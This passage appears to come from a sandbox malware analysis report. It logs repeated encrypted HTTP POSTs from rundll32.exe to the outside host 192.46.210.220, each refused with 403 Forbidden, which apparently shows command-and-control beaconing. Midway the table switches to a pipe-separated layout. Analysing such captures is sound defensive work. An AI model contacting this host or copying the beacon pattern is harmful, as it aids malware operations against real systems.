                                                        Content-Length: 4850
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:50 UTC  274                 OUT        Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:51 UTC  279                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:50 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
56          192.168.2.6  50032        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:54 UTC  279                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4850
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:54 UTC  279                 OUT        Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:54 UTC  289                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:54 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
57          192.168.2.6  50033        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:54 UTC  284                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4862
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:54 UTC  284                 OUT        Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:54 UTC  289                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:54 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
58          192.168.2.6  50052        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:57 UTC  289                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4850
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:57 UTC  289                 OUT        Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:58 UTC  299                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:58 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
59          192.168.2.6  50053        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:58 UTC  294                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4862
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:58 UTC  294                 OUT        Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:58 UTC  299                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:58 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
6           192.168.2.6  49775        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:58:12 UTC  29                  OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4862
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:58:12 UTC  30                  OUT        Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:13 UTC  34                  IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:58:13 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID: 60 | Source IP: 192.168.2.6 | Source Port: 50072 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:01 UTC | 299 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:01 UTC | 299 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:02 UTC | 309 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:02 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 61 | Source IP: 192.168.2.6 | Source Port: 50073 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:02 UTC | 304 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:02 UTC | 304 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:02 UTC | 309 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:02 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 62 | Source IP: 192.168.2.6 | Source Port: 50080 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:06 UTC | 309 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:06 UTC | 309 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:06 UTC | 314 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:06 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 63 | Source IP: 192.168.2.6 | Source Port: 50081 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:06 UTC | 314 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:06 UTC | 314 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:07 UTC | 319 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:07 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 64 | Source IP: 192.168.2.6 | Source Port: 50087 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:10 UTC | 319 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:10 UTC | 319 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:10 UTC | 329 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:10 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 65 | Source IP: 192.168.2.6 | Source Port: 50089 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:10 UTC | 324 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:10 UTC | 324 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:11 UTC | 329 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:11 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 66 | Source IP: 192.168.2.6 | Source Port: 50095 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:14 UTC | 329 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:14 UTC | 329 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:14 UTC | 334 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:14 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 67 | Source IP: 192.168.2.6 | Source Port: 50097 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:14 UTC | 334 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:00:14 UTC | 334 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:00:15 UTC | 339 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:00:15 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 68 | Source IP: 192.168.2.6 | Source Port: 50103 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:00:17 UTC | 339 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
